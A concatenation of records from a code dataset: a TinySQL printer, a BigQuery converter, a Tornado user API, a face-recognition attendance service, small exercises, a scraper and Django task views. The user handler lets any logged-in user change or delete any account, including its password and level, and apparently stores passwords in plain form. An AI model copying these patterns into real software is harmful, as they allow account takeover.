condition\n return evaluator\n\n\ndef search_column(column, tables):\n table_found = ''\n if '.' in column:\n table, column = column.split('.')\n table = (re.sub(' +', ' ', table)).strip()\n column = (re.sub(' +', ' ', column)).strip()\n if table not in tables:\n sys.stderr.write(\"Error: No such table exists.\\n\")\n quit(-1)\n return table, column\n count = 0\n for table in tables:\n if column in tables_list[table]:\n count += 1\n table_found = table\n if count > 1 or count == 0:\n sys.stderr.write(\"Error: Column name not defined correctly.\\n\")\n quit(-1)\n return table_found, column\n\ndef display_output(tables, columns, data = tables_needed, join=False, distinct=False):\n if distinct and join:\n header1 = bring_forth(tables[0], columns[tables[0]])\n header2 = bring_forth(tables[1], columns[tables[1]])\n print(header1 + '|' + header2)\n print(\"-\"*len(header1 + '|' + header2))\n result = []\n for item in data:\n ans = ''\n for column in columns[tables[0]]:\n ans += item[tables_list[tables[0]].index(column)] + '\\t|'\n for column in columns[tables[1]]:\n ans += item[tables_list[tables[1]].index(column) +\n len(tables_list[tables[0]])] + '\\t|'\n if ans.strip('\\t|') not in result:\n result.append(ans.strip('\\t|'))\n for row in result:\n print(row)\n elif len(tables) == 1 and join:\n header1 = bring_forth(tables[0], columns[tables[0]])\n print(header1)\n print(\"-\"*len(header1))\n for item in data:\n ans = ''\n for column in columns[tables[0]]:\n ans += item[tables_list[tables[0]].index(column)] + '\\t|'\n print(ans.strip('\\t|'))\n \n elif join:\n header1 = bring_forth(tables[0], columns[tables[0]])\n header2 = bring_forth(tables[1], columns[tables[1]])\n print(header1 + '|' + header2)\n print(\"-\"*len(header1 + '|' + header2))\n for item in data:\n ans = ''\n for column in columns[tables[0]]:\n ans += item[tables_list[tables[0]].index(column)] + '\\t|'\n for column in columns[tables[1]]:\n ans += item[tables_list[tables[1]].index(column) +\n len(tables_list[tables[0]])] + '\\t|'\n print(ans.strip('\\t|'))\n else:\n for table in tables:\n print(bring_forth(table, columns[table]))\n print(\"-\"*len(bring_forth(table, columns[table])))\n for data in data[table]:\n ans = ''\n for column in columns[table]:\n ans += data[tables_list[table].index(column)] + '\\t|'\n print(ans.strip('\\t|'))\n print(\"\")\n\nread_metadata(META)\nquery = sys.argv[1]\nparse_query(query)\n ","repo_name":"deeptimahesh/TinySQL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":19058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39974573322","text":"import json\nimport os\nfrom pathlib import Path\nfrom google.cloud import bigquery\nfrom datetime import datetime\n\n\ncredential_path = Path.cwd() / 'node-bigquery-privkey.json'\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = str(credential_path)\nclient = bigquery.Client()\nprevious_ts_format = \"%d/%m/%Y %H:%M:%S.%f\"\nbq_format = \"%Y-%m-%d %H:%M:%S.%f\"\n\n\ndef read_from_bigquery():\n query = \"\"\"\n select\n execution_log,\n metrics\n from\n `node-bigquery-367604.zeuz_node.reports_telus_nov28`\n where\n STARTS_WITH(run_id, 'Mon-Nov-28');\n \"\"\"\n\n queryJob = client.query(query)\n data = queryJob.result()\n result = []\n for d in data:\n result.append((\n json.loads(d.execution_log),\n json.loads(d.metrics),\n ))\n return result\n\n\ndef convert_ts(prev_ts):\n return datetime.strftime(\n datetime.strptime(prev_ts, previous_ts_format),\n # prev_ts,\n bq_format,\n )\n\n\ndef send_to_bigquery(execution_log, metrics):\n client = bigquery.Client()\n action_table_id = \"node-bigquery-367604.zeuz_node.zeuz_metrics_node_actions\"\n steps_table_id = \"node-bigquery-367604.zeuz_node.zeuz_metrics_node_steps\"\n\n run_id = execution_log[\"run_id\"]\n tc_id = execution_log[\"test_cases\"][0][\"testcase_no\"]\n\n steps = metrics[\"node\"][\"steps\"]\n actions = metrics[\"node\"][\"actions\"]\n try:\n browser_perf = metrics[\"browser_performance\"][\"default\"]\n except:\n browser_perf = list()\n\n # A dict of step id to step name\n step_names = {}\n for step in steps:\n if \"id\" not in step:\n return\n step_names[step[\"id\"]] = step[\"name\"]\n\n\n def send_actions_metrics():\n for action in actions:\n action[\"run_id\"] = run_id\n action[\"tc_id\"] = tc_id\n if \"step_id\" not in action:\n continue\n action[\"step_name\"] = step_names[action[\"step_id\"]]\n action[\"time_stamp\"] = convert_ts(action[\"timestamp\"])\n del action[\"timestamp\"]\n\n rows_to_insert = actions\n errors = client.insert_rows_json(action_table_id, rows_to_insert)\n if len(errors) == 0:\n print(\"Sent action metrics report to BigQuery\")\n else:\n print(f\"Encountered errors while inserting rows: {errors}\")\n\n\n def send_steps_metrics():\n for step in steps:\n step[\"run_id\"] = run_id\n step[\"tc_id\"] = tc_id\n step[\"step_id\"] = step[\"id\"]\n del step[\"id\"]\n step[\"step_name\"] = step[\"name\"]\n del step[\"name\"]\n step[\"step_sequence\"] = step[\"sequence\"]\n del step[\"sequence\"]\n step[\"time_stamp\"] = convert_ts(datetime.today())\n if \"actions\" in step:\n del step[\"actions\"]\n\n rows_to_insert = steps\n errors = client.insert_rows_json(steps_table_id, rows_to_insert)\n if len(errors) == 0:\n print(\"Sent step metrics report to BigQuery\")\n else:\n print(f\"Encountered errors while inserting rows: {errors}\")\n\n\n def send_browser_perf_metrics():\n rows_to_insert = json.dumps(browser_perf)\n\n\n send_actions_metrics()\n # send_steps_metrics()\n send_browser_perf_metrics()\n\n\ndef main():\n\n data = read_from_bigquery()\n for execution_log, metrics in data:\n send_to_bigquery(execution_log, metrics)\n\n # with open(\"sample_metrics.json\", \"r\") as f:\n # data = json.load(f)\n\n # A dict of step id to step name\n # step_names = {}\n # for step in steps:\n # step_names[step[\"id\"]] = step[\"name\"]\n # data = convert(data)\n\nmain()\n","repo_name":"AutomationSolutionz/Zeuz_Python_Node","sub_path":"Framework/metrics/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"7777355296","text":"# coding=utf-8\n\nimport logging\nfrom .base import BaseHandler\nfrom models.user import User\nfrom utils.check import require_login\n\n\nclass UserHandler(BaseHandler):\n \"\"\"获取用户信息\"\"\"\n def is_shop(self):\n return True if self.request.uri.startswith(\"/shop/\") else False\n\n def get(self, uid):\n \"\"\"\n @apiDescription 获取用户信息\n @api {get} /user/([0-9]+)/? 获取用户信息\n @api {get} /shop/([0-9]+)/? 获取商家信息\n @apiGroup user\n @apiGroup shop\n\n @apiParam {Number} uid 用户uid\n\n @apiPermission user\n\n @apiSuccess {Number} uid 用户uid\n @apiSuccess {String} avatar 头像\n @apiSuccess {String} name 用户名\n @apiSuccess {Number} speed 配送时间,仅商家时出现\n @apiSuccess {Number} sales_count 销量,仅商家出现\n @apiSuccess {Number} lowest_money 起送价,仅商家出现\n @apiSuccess {Boolean} invoice 是否开具发票,仅商家出现\n @apiSuccess {Boolean} free_send 是否免费配送,如果非免费配送,统一收配送费1元\n @apiSuccess {Integer} distance 距离,仅商家出现\n @apiSuccess {Boolean} new_seller 是否为新商家,仅商家出现\n @apiSuccess {Number} level 用户级别,仅获取自己信息时出现\n @apiSuccess {String} register_at 注册时间,仅获取自己信息时出现\n @apiSuccess {String} phone 手机号,仅获取自己信息时出现\n @apiSuccess {Array} address 配送地址,仅获取自己信息时出现\n @apiSuccessExample {json} Success Response:\n {\n \"uid\": 1,\n \"avatar\": \"http://xxxx.com/avatar.png\",\n \"name\": \"001\",\n // 以下为用户获取自己信息时才会出现\n \"level\": 0,\n \"register_at\": \"2016-03-27 00:00:00\",\n \"phone\": \"99999\",\n \"address\": []\n }\n\n @apiError UserNotExists 用户不存在\n \"\"\"\n uid = int(uid)\n # hack: 因为改url涉及面太广,所以通过查看self.require_shop 来判定吧-。-\n shop = self.is_shop()\n\n user = User.get_instance_by_id(self.orm_session, uid)\n if user:\n result = self._get_user_info(user, shop)\n self.write(result)\n else:\n self.write(dict(\n status=1,\n msg=\"no such user\",\n ))\n\n @require_login\n def put(self, uid):\n \"\"\"\n @apiDescription 修改用户信息\n @api {put} /user/([0-9]+)/? 修改用户信息\n @api {put} /shop/([0-9]+)/? 修改商家信息\n @apiGroup user\n @apiGroup shop\n\n @apiParam {Number} [uid] uid\n @apiParam {Number} [level] 级别\n @apiParam {String} [passwd] 密码\n @apiParam {String} [phone] 手机号\n @apiParam {String} [name] 名字\n @apiParam {String} [address] 地址\n\n @apiPermission user\n\n @apiError UserNotExists 用户不存在\n \"\"\"\n to_change = dict(\n avatar=self.get_argument(\"avatar\", None),\n level=int(self.get_argument(\"level\", 0)),\n passwd=self.get_argument(\"passwd\", None),\n phone=self.get_argument(\"phone\", None),\n name=self.get_argument(\"name\", None),\n address=self.get_argument(\"addresses\", None)\n )\n\n user = User.get_instance_by_id(self.orm_session, uid)\n if not user:\n self.write(dict(\n status=1,\n msg=\"user does not exists\"\n ))\n return\n\n for key, value in to_change.items():\n if value:\n setattr(user, key, value)\n self.orm_session.commit()\n self.write({})\n\n @require_login\n def delete(self, uid):\n \"\"\"\n @apiDescription 删除用户信息\n @api {delete} /user/([0-9]+)/? 删除用户信息\n @api {delete} /shop/([0-9]+)/? 删除商家信息\n @apiGroup user\n @apiGroup shop\n\n @apiPermission user\n \"\"\"\n User.delete(self.orm_session, uid)\n self.write({})\n\n\nclass RegisterHandler(BaseHandler):\n \"\"\"\n @apiDescription 创建用户\n @api {post} /user/new 创建新用户\n @apiGroup user\n\n @apiParam {String} phone 手机号\n @apiParam {String} passwd 密码\n @apiParam {String} [name] 用户名,可缺省,默认为电话号码\n\n @apiPermission user\n\n @apiSuccess {Number} uid 用户uid,全局唯一\n\n @apiError UserExists 手机号已存在\n @apiError UserLevelError 所申请的用户级别错误\n \"\"\"\n def post(self):\n level = int(self.get_argument(\"level\", 0))\n if not 0 <= level < 2:\n self.write(dict(\n status=1,\n msg=\"illegal\"\n ))\n return\n\n phone = self.get_argument(\"phone\")\n passwd = self.get_argument(\"passwd\")\n name = self.get_argument(\"name\", phone)\n\n try:\n user = User(\n level=level,\n phone=phone,\n passwd=passwd,\n name=name,\n )\n self.orm_session.add(user)\n self.orm_session.commit()\n self.orm_session.refresh(user)\n\n self.write(dict(\n uid=user.id,\n ))\n except Exception as e:\n import traceback\n traceback.print_stack()\n logging.error(e)\n self.write(dict(\n status=1,\n msg=\"failed to register\",\n ))\n","repo_name":"jiajunhuang/graduation","sub_path":"controllers/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":5600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14895609082","text":"# core\nimport os\nfrom werkzeug.utils import secure_filename\nimport base64\nfrom io import BytesIO\n\n# for croping face & create clf\nfrom utils.helpers import preprocess_image\nimport face_recognition\nimport pickle\nfrom PIL import Image\nimport shutil\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix, precision_score, recall_score, accuracy_score, classification_report\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport imgaug.augmenters as iaa\nfrom mtcnn import MTCNN\n\n# for detect face\nimport cv2\n\n# import utils\nfrom utils.helpers import KNNClassifier\nfrom utils.helpers import generate_response\n\n# ============================\n# Check Is Employe Have Folder\n# ============================\ndef check_employee_folder(request):\n employee_id = request.args.get('employeeid')\n\n folder_path = os.path.join('assets', 'photo_frame', f\"employee_{employee_id}\") # Path lengkap ke folder employee\n \n if os.path.exists(folder_path):\n return generate_response(message=f\"Folder for employee {employee_id} exists.\",status=200)\n else:\n return generate_response(message=f\"Folder for employee {employee_id} does not exists.\",status=404)\n\n# ============================================\n# Re Create .clf if new employee create folder\n# ============================================\ndef create_model_file(request):\n \n employee_id = request.form.get('employeeid')\n file = request.files.get('photo')\n\n folder_path = os.path.join('assets', 'photo_frame', f\"employee_{employee_id}\") # Path lengkap ke folder employee\n\n # Membuat folder jika belum ada\n if os.path.isfile(\"assets/model/trained_knn_model.clf\"):\n os.remove(\"assets/model/trained_knn_model.clf\")\n os.remove(\"assets/model/confusion_Matrix.png\")\n \n os.makedirs(folder_path, exist_ok=True)\n\n # Mengubah file menjadi objek Image\n image = Image.open(file)\n image_name = os.path.splitext(file.filename)[0]\n\n num_images = 30\n\n # Buat direktori output jika belum ada\n output_dir = folder_path\n os.makedirs(output_dir, exist_ok=True)\n\n seq = iaa.Sequential([\n iaa.Fliplr(0.5), # Membalik gambar secara horizontal dengan peluang 0.5\n iaa.GaussianBlur(sigma=(0, 0.5)), # Menambahkan efek blur dengan sigma antara 0 dan 0.5\n iaa.Affine(rotate=(-45, 45)), # Memutar gambar antara -45 dan 45 derajat\n iaa.AdditiveGaussianNoise(scale=(0, 0.1 * 255)), # Menambahkan noise Gaussian\n iaa.Multiply((0.8, 1.2), per_channel=0.2), # Mengalikan intensitas warna dengan faktor antara 0.8 dan 1.2\n iaa.LinearContrast((0.75, 1.5)), # Menambahkan kontras linear\n iaa.Crop(percent=(0, 0.1)) # Memotong sebagian gambar secara acak\n ], random_order=True) # Mengatur urutan augmentasi secara acak\n\n num_images = int(num_images)\n\n detector = MTCNN()\n\n face_detected = False # Flag untuk menandakan apakah wajah terdeteksi\n\n for i in range(num_images):\n augmented_image = seq.augment_image(np.array(image))\n augmented_image = augmented_image[:, :, :3] # Menghilangkan saluran warna keempat (alpha channel)\n detections = detector.detect_faces(augmented_image)\n\n if len(detections) > 0:\n face_detected = True\n for j, detection in enumerate(detections):\n bounding_box = detection['box']\n face_image = augmented_image[bounding_box[1]:bounding_box[1]+bounding_box[3], bounding_box[0]:bounding_box[0]+bounding_box[2]]\n output_path = os.path.join(output_dir, f\"{image_name}_{i}_{j}.jpg\")\n Image.fromarray(face_image).save(output_path)\n print(f\"Bagian wajah teraugmentasi disimpan: {output_path}\")\n\n if not face_detected:\n shutil.rmtree(folder_path) # Hapus folder parent\n return generate_response(message=\"No face detected\", status=400)\n\n # Membuka folder assets/photo_frame\n encodings = []\n employeesId = []\n\n employees_folder = os.listdir(\"assets/photo_frame\")\n\n # Perulangan akan melalui setiap dataset dalam direktori pelatihan\n for employee_folder in employees_folder:\n employee_images = os.listdir(os.path.join(\"assets/photo_frame\", employee_folder))\n\n # Loop melalui setiap gambar latih untuk orang yang saat ini\n for employee_image in employee_images:\n # Dapatkan enkode wajah untuk wajah di setiap file gambar\n face = face_recognition.load_image_file(os.path.join(\"assets/photo_frame\", employee_folder, employee_image))\n\n # Anggap seluruh gambar adalah lokasi wajah\n height, width, _ = face.shape\n face_location = (0, width, height, 0)\n face_enc = face_recognition.face_encodings(face, known_face_locations=[face_location])\n face_enc = np.array(face_enc)\n face_enc = face_enc.flatten()\n\n # Tambahkan enkode wajah untuk gambar saat ini dengan label yang sesuai (nama) ke data latihan\n encodings.append(face_enc)\n employeesId.append(employee_folder)\n\n # Bagi data menjadi set latihan dan pengujian\n uniqueId = np.unique(employeesId)\n \n encodings_train = []\n encodings_test = []\n idTrain = []\n idTest = []\n\n for id in uniqueId:\n name_encodings = [encoding for encoding, n in zip(encodings, employeesId) if n == id]\n name_labels = [n for n in employeesId if n == id]\n encodings_train_value, encodings_test_value, idTrain_value, idTest_value = train_test_split(name_encodings, name_labels, test_size=0.3, random_state=42)\n encodings_train.extend(encodings_train_value)\n encodings_test.extend(encodings_test_value)\n idTrain.extend(idTrain_value)\n idTest.extend(idTest_value)\n\n # Buat dan latih klasifikasi KNN\n knn_clf = KNNClassifier(n_neighbors=9, weights='distance')\n knn_clf.fit(encodings_train, idTrain)\n\n # Evaluasi klasifikasi pada data pengujian\n predictions = knn_clf.predict(encodings_test)\n accuracy = accuracy_score(idTest, predictions)\n precision = precision_score(idTest, predictions, average='weighted')\n recall = recall_score(idTest, predictions, average='weighted')\n report = classification_report(idTest, predictions)\n\n # Cetak hasil Akurasi, Presisi, Recall, dan Laporan Klasifikasi\n print(\"Akurasi:\", accuracy)\n print(\"Presisi:\", precision)\n print(\"Recall:\", recall)\n print(\"Laporan Klasifikasi:\\n\", report)\n print(\"Pelatihan selesai!\")\n\n # Simpan klasifikasi KNN yang telah dilatih\n if \"assets/model/trained_knn_model.clf\" is not None:\n with open(\"assets/model/trained_knn_model.clf\", 'wb') as f:\n pickle.dump(knn_clf, f)\n\n # Buat confusion matrix\n cm = confusion_matrix(idTest, predictions)\n class_names = np.unique(employeesId)\n\n plt.figure(figsize=(15, 15))\n sns.heatmap(cm, annot=True, fmt='d', cmap='Blues', xticklabels=class_names, yticklabels=class_names)\n plt.title('Confusion Matrix')\n plt.xlabel('Predicted Label')\n plt.ylabel('True Label')\n plt.xticks(rotation=45)\n plt.savefig('assets/model/confusion_Matrix.png')\n\n return generate_response(message=\"Photos saved successfully.\", status=200)\n\n# ========================================\n# Face detection for attendance validation\n# ========================================\ndef compare_faces(request):\n employee_id = request.form.get('employeeid')\n photo = request.files.get('photo')\n\n # Membaca konten file foto sebagai bytes\n photo_bytes = photo.read()\n\n # Membuat objek BytesIO dari bytes foto\n photo_bytesio = BytesIO(photo_bytes)\n\n accuracy = 0\n employee_folder_name = \"\"\n\n # load .clf\n with open(\"assets/model/trained_knn_model.clf\", 'rb') as f:\n knn_clf = pickle.load(f)\n \n image = face_recognition.load_image_file(photo_bytesio)\n X_face_locations = face_recognition.face_locations(image)\n \n if len(X_face_locations) != 0:\n # Find encodings for faces in the test iamge\n faces_encodings = face_recognition.face_encodings(image, known_face_locations=X_face_locations)\n\n # Use the KNN model to find the best matches for the test face\n closest_distances = knn_clf.kneighbors(faces_encodings, n_neighbors=1)\n are_matches = [closest_distances[0][i][0] <= 0.4 for i in range(len(X_face_locations))]\n predictions = [(pred, loc) if rec else (\"unknown\", loc) for pred, loc, rec in zip(knn_clf.predict(faces_encodings), X_face_locations, are_matches)]\n lp = 0\n\n for name, (top, right, bottom, left) in predictions:\n accuracy = closest_distances[0][lp][0]\n employee_folder_name = name\n lp = lp + 1\n\n if(employee_folder_name == \"\"):\n return generate_response(message=\"no face\", status=400)\n else:\n print(f\"folder: {employee_folder_name}\")\n if(f\"employee_{employee_id}\" == employee_folder_name):\n return generate_response(message=f\"face confirmed. accuracy {accuracy}%\", status=200)\n else:\n return generate_response(message=\"face mismatch\", status=400)\n","repo_name":"korospace/absensi_pegawai_facedetection","sub_path":"face_detection/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":9252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3106347754","text":"\"\"\"An isogram is a word that has no duplicate letters. \nCreate a function that takes a string and returns either \nTrue or False depending on whether or not it's an 'isogram'.\nExamples\n'Algorism' ➞ True\n'PasSword' ➞ False\n# Not case sensitive.\n'Consecutive' ➞ False\"\"\"\n\n\n\nword = input(\"type some word ->\")\n\nclean_word = word.lower()\nletters = set(clean_word)\n\nresult = len(letters) == len(clean_word)\n\nprint(result)","repo_name":"avagyani/Python_course","sub_path":"Week4/Week4_1/Homework_10.py","file_name":"Homework_10.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15899151240","text":"#contoh 1 \n# def siapa_karakterOverPower_onePiece(): #fungsi \n# print('luffy','zoro','sanji') \n\n# siapa_karakterOverPower_onePiece() \n# siapa_karakterOverPower_onePiece() \n# siapa_karakterOverPower_onePiece() \n\n#contoh 2 \n#kita akan membuat beberapa function \n# def alim(): #nama funngsiya bebas yah \n# print('hay lim') \n# def one_piece(): \n# print('oy luffy') \n# def naruto(): \n# print('aku pasti akan menjadi hokage') \n\n# alim() \n# one_piece() \n# naruto() \n\n#ok neks variabel dalam function \n#contoh \n# def hitung_luas_segitiga(): \n# alas = 5\n# tinggi = 10\n# luas = (alas * tinggi) /2 \n# print('luas segitiga = ', luas) \n\n# hitung_luas_segitiga() \n \n#latihan menghitung luas segitiga dan volume : \n\ndef hitung_luas(alas , tinggi , luas): \n alas =() \n tinggi = () \n luas = (alas * tinggi ) / 2 \n \ndef volume_balok(alas,tinggi,volume): \n alas = () \n tinggi = () \n volume =(alas * tinggi) / 2 \n \n alas = (5) \n tinggi = (10) \n \nhitung_luas() \nvolume_balok() \n#kalo teman teman mengikuti cara yg di atas otomatis program teman\" akan error karna itu struktur programmnya salah\n#teman teman harus mengikuti contoh program yang saya share di bawah ini \n \ndef hitung_luas(): \n alas = 10 \n tinggi = 5 \n luas = (alas * tinggi) / 2 \n print('luasnya =' , luas) \ndef hitung_volume(): \n a = 5 \n b = 2 \n volume = (a * b) / 2 \n print('volumenya = ' , volume) \n\nhitung_luas() \nhitung_volume() \n\n#sekian untuk hari ini \n#terimakasih \n\n\n\n \n\n\n\n\n\n\n","repo_name":"AlimRabbani/RPL-1-DASAR-PHYTON-","sub_path":"fungsi.py","file_name":"fungsi.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31189614367","text":"# @before-stub-for-debug-begin\nfrom python3problem51 import *\nfrom typing import *\n# @before-stub-for-debug-end\n\n#\n# @lc app=leetcode.cn id=51 lang=python3\n#\n# [51] N 皇后\n#\n\n# @lc code=start\nclass Solution:\n def solveNQueens(self, n: int) -> List[List[str]]:\n # if n == 1:\n # return [[\"Q\"]]\n res = []\n pth = []\n matrix = [[1]* n for _ in range(n)]\n di = {}\n for i in range(n):\n di[i] = \".\"*(i) + \"Q\" + \".\"*(n-i-1)\n\n def off(r, c):\n offset = set()\n for i in range(n):\n if matrix[i][c]:\n matrix[i][c] = 0\n offset.add((i, c))\n for j in range(n):\n if matrix[r][j]:\n matrix[r][j] = 0\n offset.add((r, j))\n k = 1\n while k < n:\n for a,b in [(k,k), (k,-k), (-k, k), (-k, -k)]:\n a += r\n b += c\n if 0<=a<n and 0<=b<n and matrix[a][b]:\n matrix[a][b] = 0\n offset.add((a, b))\n k += 1\n return offset\n\n def back(offset):\n for i,j in offset:\n matrix[i][j] = 1\n \n def backtracking(depth):\n if depth == n:\n res.append(pth[:])\n return True\n\n for i in range(n):\n for j in range(n):\n if matrix[i][j]:\n if i != depth: # 剪枝,\n continue # 第i个皇后必须放在第i行\n pth.append(di[j]) # ((i, j))\n # pth.append(j)\n offset = off(i, j) # 将皇后可达位置涂黑\n backtracking(depth+1)\n back(offset) # 恢复上一个皇后涂黑的位置\n pth.pop()\n \n backtracking(0)\n print(res)\n return res\n\n\"\"\"\nAccepted\n9/9 cases passed (176 ms)\nYour runtime beats 8.19 % of python3 submissions\nYour memory usage beats 67.3 % of python3 submissions (15.2 MB)\n\"\"\"\n\n# @lc code=end\n\n","repo_name":"Interesting6/FuckLeetCode","sub_path":"51.n-皇后.py","file_name":"51.n-皇后.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11601690721","text":"import json\n\nfrom lightspider import Spider, light, get_response\nfrom lxml import etree\n\n\ndef clean_str(x):\n if isinstance(x, str):\n return x.strip()\n elif isinstance(x, list):\n return [item.strip() for item in x]\n\n\ndef extract(html):\n paras = html.xpath('./p|./h1|./h2|./h3|./h4|./h5|./ul|./ol|./figure|./div[@class=\"table-container\"]')\n if not paras:\n return html.xpath('string(.)')\n result = []\n\n for para in paras:\n if para.xpath('name(.)') == 'p':\n if para.xpath('.//img'):\n result.append({\n 'type': 'img',\n 'href': para.xpath('string(.//img/@src)').strip()\n })\n elif para.xpath('.//figure'):\n result.append({\n 'type': 'p',\n 'text': '\\n'.join(para.xpath('./text()'))\n })\n result.extend(extract(para))\n else:\n result.append({\n 'type': 'p',\n 'text': para.xpath('string(.)').strip()\n })\n elif para.xpath('name(.)') == 'figure':\n code_type = para.xpath('string(./@class)').split()[-1]\n code_lines = []\n for code_line in para.xpath('.//td[@class=\"code\"]//span[@class=\"line\"]'):\n code_lines.append(code_line.xpath('string(.)'))\n result.append({\n 'type': 'code',\n 'code': {\n 'type': code_type,\n 'source': '\\n'.join(code_lines)\n }\n })\n elif para.xpath('string(./@class)') == 'table-container':\n headers = para.xpath('.//th/text()')\n rows = [x.xpath('.//td/text()') for x in para.xpath('.//tbody//tr')]\n result.append({\n 'type': 'table',\n 'table': {\n 'headers': headers,\n 'rows': rows\n }\n })\n elif para.xpath('name(.)') in ['ol', 'ul']:\n result.append({\n 'type': para.xpath('name(.)'),\n 'lis': [extract(x) for x in para.xpath('./li')]\n })\n else:\n result.append({\n 'type': para.xpath('name(.)'),\n 'text': para.xpath('string(.)').strip()\n })\n return result\n\n@light\ndef parser(response):\n html = etree.HTML(response.text)\n title = clean_str(html.xpath('string(//h1[@class=\"title\"])'))\n content = extract(html.xpath('//div[@class=\"article-entry\"]')[0])\n created_time = clean_str(html.xpath('string(//div[@id=\"header-meta\"]//time)'))\n categories = clean_str(html.xpath('//div[@id=\"header-meta\"]//div[@class=\"metatag cats\"]//a/text()'))\n latest_time = clean_str(html.xpath('string(//section[@id=\"footer-meta\"]//time)'))\n tags = clean_str(html.xpath('//section[@id=\"footer-meta\"]//div[@class=\"metatag tags\"]//a/text()'))\n return {\n 'title': title,\n 'content': content,\n 'created_time': created_time,\n 'categories': categories,\n 'latest_time': latest_time,\n 'tags': tags,\n 'url': response.url\n }, None\n\n\nif __name__ == '__main__':\n base_url = r'http://www.lightsmile.cn{}'\n archives_url = r'http://www.lightsmile.cn/archives'\n archives_res = get_response(archives_url)\n archives_html = etree.HTML(archives_res.text)\n section = archives_html.xpath('//section[@class=\"archive\"]')[0]\n archives = section.xpath('.//a')\n tasks = []\n for archive in archives:\n tasks.append(archive.xpath('string(./@href)'))\n save_format = 'json'\n\n spider = Spider(base_url=base_url, save_format=save_format, save_path=r'D:\\Data\\NLP\\corpus\\my_blogs_test')\n spider.run(tasks, parser)\n # test_url = base_url.format(tasks[39])\n # test_res = get_response(test_url)\n # test_result = parser(test_res)\n # print(test_result)\n # test_url = base_url.format(tasks[39])\n # test_res = get_response(test_url)\n # test_result = parser(test_res)\n","repo_name":"smilelight/lightSpider","sub_path":"examples/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"27179424145","text":"from django.shortcuts import redirect, render\nfrom django.http import HttpRequest\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import Group\nfrom django.contrib import messages\n\nfrom core.forms import *\nfrom . import models\nfrom . import utils\n\n# Create your views here.\n\n@utils.logout_required(redirect_url=\"tasks\")\ndef register_user(request: HttpRequest):\n form = NewUserForm()\n\n context = {\"form\": form}\n\n if request.method == \"POST\":\n form = NewUserForm(request.POST)\n\n if(form.is_valid()):\n form.save()\n user = authenticate(username=form.cleaned_data[\"username\"], password=form.cleaned_data[\"password1\"])\n\n newList = models.TaskList(user=user)\n newList.save()\n\n if(user is not None):\n print(\"hello\")\n login(request, user)\n \n return redirect(\"tasks\")\n else:\n placeholders = {\"min_length\": 9, \"model_name\": \"User\", \"field_label\": \"email\"}\n utils.process_form_errors(form.errors.as_data(), context, placeholders)\n\n print(context)\n return render(request, \"core/register.html\", context)\n\n@utils.logout_required(redirect_url=\"tasks\")\ndef login_user(request):\n form = LoginForm()\n context = {\"form\": form}\n\n if request.method == \"POST\":\n form:LoginForm = LoginForm(request.POST)\n\n if(form.is_valid()):\n user = authenticate(username=form.cleaned_data['username'], password=form.cleaned_data['password'])\n if(user is not None):\n login(request, user)\n\n return redirect(\"tasks\")\n else:\n messages.error(request, \"User not found\")\n else:\n print(form.errors.as_data())\n utils.process_form_errors(form.errors.as_data(), context, {})\n\n return render(request, \"core/login.html\", context)\n\n@login_required(login_url=\"login\")\n@utils.group_required(group_name=\"Verified\", redirect_url=\"verify\")\ndef get_tasks(request: HttpRequest):\n\n user = request.user\n form = TaskForm()\n\n tasklisk:models.TaskList = models.TaskList.objects.get(user=user).task_set.all()\n \n return render(request, \"core/tasks.html\", {\"tasklist\": tasklisk, \"form\": form})\n\n@login_required(login_url=\"login\")\n@utils.group_required(group_name=\"Verified\", redirect_url=\"verify\")\ndef create_task(request: HttpRequest):\n \n context = {\"task\":request.POST[\"task\"], \"tasklist\":models.TaskList.objects.get(user=request.user)}\n newTask = models.Task(task=context[\"task\"], tasklist=context[\"tasklist\"])\n newTask.save()\n\n return redirect(\"tasks\")\n\n@login_required(login_url=\"login\")\n@utils.group_required(group_name=\"Verified\", redirect_url=\"verify\")\ndef delete_task(request: HttpRequest, pk: int):\n task:models.Task = models.Task.objects.get(id=pk)\n\n if(request.method == \"POST\"):\n task.delete()\n\n return redirect(\"tasks\")\n\n@login_required(login_url=\"login\")\ndef logout_user(request: HttpRequest):\n logout(request)\n\n return redirect(\"login\")\n\n@login_required(login_url=\"login\")\n@utils.group_unrequired(group_name=\"Verified\", redirect_url=\"tasks\")\ndef verify_user(request: HttpRequest):\n valid:models.UserValidation = utils.get_validation(request.user)\n\n if(valid == None):\n valid = models.UserValidation(user=request.user)\n valid.save()\n elif(valid.expired(30)):\n valid.generate_new_code()\n \n form = ValidationForm()\n context = {\"form\": form}\n\n if(request.method == \"POST\"):\n form = ValidationForm(request.POST)\n if(form.is_valid()):\n if(request.POST[\"code\"] == valid.code):\n group:Group = Group.objects.get(name=\"Verified\")\n group.user_set.add(request.user)\n valid.delete()\n\n return redirect(\"tasks\")\n else:\n messages.error(request, \"The codes don't match\")\n else:\n utils.process_form_errors(form.errors.as_data(), context, {})\n\n if(valid.sent == False):\n sent = utils.send_verify_email(request, valid)\n\n if(sent == 1):\n valid.sent = True\n valid.save()\n else:\n messages.error(request, \"Can't send to given email\")\n\n return render(request, \"core/verify.html\", 